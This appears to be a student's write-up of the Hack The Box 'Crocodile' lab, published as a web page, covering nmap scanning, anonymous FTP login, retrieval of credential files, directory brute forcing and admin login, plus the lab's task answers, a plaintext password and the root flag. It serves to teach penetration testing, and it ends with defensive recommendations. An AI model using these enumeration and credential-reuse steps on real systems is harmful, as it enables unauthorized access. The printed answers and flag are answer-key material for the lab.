End-to-end engagement showing service behavior, attack-path logic, and containment strategy. Reflects practical penetration testing methodology.<\/p>\n\n\n\n
# Penetration Test Report: HTB Crocodile\n\n## 1. Objective\n\nThe purpose of this engagement was to assess the security posture of the HTB Crocodile machine by identifying exposed services, enumerating available access points, and validating authentication weaknesses. This report outlines the reconnaissance process, discovered vulnerabilities, exploitation steps, and the final capture of the root flag.\n\n---\n\n## 2. Target Information\n\n**Target Host:** Crocodile \n**IP Address:** 10.129.184.140 \n**Operating System:** Ubuntu (Apache 2.4.41 detected) \n**Services:** FTP, HTTP, DNS (filtered)\n\n---\n\n## 3. Methodology\n\nThis assessment followed a straightforward workflow:\n\n1. Recon \n2. Enumeration \n3. Credential Discovery \n4. Web Authentication Bypass \n5. Post-Authentication Validation \n\nAll testing was performed inside the authorized HTB environment.\n\n---\n\n## 4. Recon and Enumeration\n\n### 4.1 Nmap Scan\n\n**Command:**\n```bash\nsudo nmap -sV -O 10.129.184.140\n````\n\n### Scan Summary\n\nNmap revealed an open FTP server with anonymous login enabled and an Apache web server hosting the application.\n\n| Port | State | Service | Version |\n| ------ | -------- | ------- | ---------------------------- |\n| 21\/tcp | open | ftp | vsftpd 3.0.3 |\n| 53\/tcp | filtered | domain | unknown |\n| 80\/tcp | open | http | Apache httpd 2.4.41 (Ubuntu) |\n\nThe presence of anonymous FTP access is a critical finding.\n\n---\n\n## 5. FTP Enumeration\n\n### Task 1\n\n**Nmap switch that uses default scripts:**\n\n```\n-sC\n```\n\n### Task 2\n\n**Service on port 21:**\n\n```\nvsftpd 3.0.3\n```\n\nConnect to FTP:\n\n```bash\nftp 10.129.184.140\n```\n\nLogin credentials:\n\n```\nUsername: anonymous\n```\n\n### Task 3\n\n**FTP code for successful anonymous login:**\n\n```\n230\n```\n\n### Task 4\n\n**Anonymous login username:**\n\n```\nanonymous\n```\n\n### Task 5\n\n**Command to download files from FTP:**\n\n```\nget\n```\n\nAfter logging in:\n\n```bash\nls\n```\n\nYou will find:\n\n```\nallowed.userlist\nallowed.userlist.passwd\n```\n\nDownload both:\n\n```bash\nget allowed.userlist\nget allowed.userlist.passwd\n```\n\n### Task 6\n\n**High privilege sounding username found:**\n\n```\nadmin\n```\n\nThese files provide usernames and passwords for later web authentication.\n\n---\n\n## 6. Web Enumeration\n\n### Task 7\n\n**Apache version running on the host:**\n\n```\nApache httpd 2.4.41\n```\n\n### Task 8\n\n**Gobuster switch for filetype extension searches:**\n\n```\n-x\n```\n\n### Task 9\n\n**PHP file discovered via directory brute force that enables login:**\n\nUse Feroxbuster or Gobuster. Example:\n\n```bash\nferoxbuster -u http:\/\/10.129.184.140 --extensions \"php,txt\"\n```\n\nImportant directory discovered:\n\n```\n\/dashboard\/\n```\n\nThis redirects to:\n\n```\nlogin.php\n```\n\n**Answer:**\n\n```\nlogin.php\n```\n\n---\n\n## 7. Exploitation\n\nUsing the credentials obtained from the FTP files:\n\n```\nusername: admin\npassword: rKXM59ESxesUFHAd\n```\n\nLog in at:\n\n```\nhttp://10.129.184.140\/dashboard\/login.php\n```\n\nAfter successful authentication, the application displays the root flag.\n\n---\n\n## 8. Proof of Compromise\n\n**Root Flag:**\n\n```\nc7110277ac44d78b6a9fff2232434d16\n```\n\nThis confirms full access to the internal dashboard and successful compromise of the machine.\n\n---\n\n## 9. Recommendations\n\n1. Disable anonymous FTP access.\n2. Enforce strong authentication for file storage areas.\n3. Restrict FTP exposure to trusted networks.\n4. Implement directory traversal protection and enumeration rate limiting.\n5. Avoid storing plaintext credentials in public directories.\n6. Monitor access logs for unusual brute force attempts.\n\n---\n\n## 10. Conclusion\n\nThe Crocodile machine was compromised through a combination of anonymous FTP access and exposed credential files. These credentials allowed direct authentication into the dashboard application, leading to retrieval of the root flag. Proper access control and secure credential handling would prevent this attack path.\n\n---\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"End-to-end engagement showing service behavior, attack-path logic, and containment strategy. Reflects practical penetration testing methodology.<\/p>\n","protected":false},"author":30346,"featured_media":0,"parent":324,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/363"}],"collection":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/users\/30346"}],"replies":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/comments?post=363"}],"version-history":[{"count":1,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/363\/revisions"}],"predecessor-version":[{"id":364,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/363\/revisions\/364"}],"up":[{"embeddable":true,"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/pages\/324"}],"wp:attachment":[{"href":"https:\/\/sites.wp.odu.edu\/isaac-huston\/wp-json\/wp\/v2\/media?parent=363"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}